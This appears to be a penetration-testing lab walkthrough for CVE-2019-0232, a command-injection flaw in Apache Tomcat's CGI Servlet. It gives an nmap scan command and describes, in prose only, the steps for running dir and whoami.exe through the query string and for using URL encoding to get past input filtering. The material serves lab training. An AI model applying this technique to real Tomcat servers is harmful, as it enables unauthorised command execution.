1. Vulnerability Overview
CVE-2019-0232 - Remote Code Execution (RCE)
Description: Allows remote code execution due to improper input validation in the CGI Servlet when enableCmdLineArguments is set to true.
Affected Versions:
Tomcat 9.0.0.M1 to 9.0.17
Cause:
The CGI Servlet fails to properly sanitize user-supplied input from the query string, leading to command injection.
Identify open ports and running services, particularly Apache Tomcat.
nmap -p- -sC -Pn 10.129.204.227 --open
CGI Script Discovery (ffuf)
Discover CGI scripts using directory fuzzing.
This command fuzzes for CGI scripts with the .bat extension and may reveal welcome.bat.
3. Exploitation
Basic Command Injection
Execute the dir command to list files.
Retrieve Environment Variables
Check for useful system environment variables.
This can reveal critical information, such as the PATH variable being unset.
Hardcoded Path Execution (whoami)
Attempt to execute whoami.exe by specifying its full path.
This may fail if special characters are filtered.
URL Encoding Bypass
Bypass character filtering using URL encoding.
This allows execution of whoami.exe despite input restrictions.
4. Key Considerations
The enableCmdLineArguments setting must be enabled for this exploit to work.
The & character is used to separate commands in the injection.
If the PATH environment variable is unset, commands must be executed with their full path.
URL encoding can help bypass character filtering.
Only test on systems you have explicit permission to assess.
Replace IP addresses, ports, and URLs with your specific target information.
5. Commands Summary
Last updated
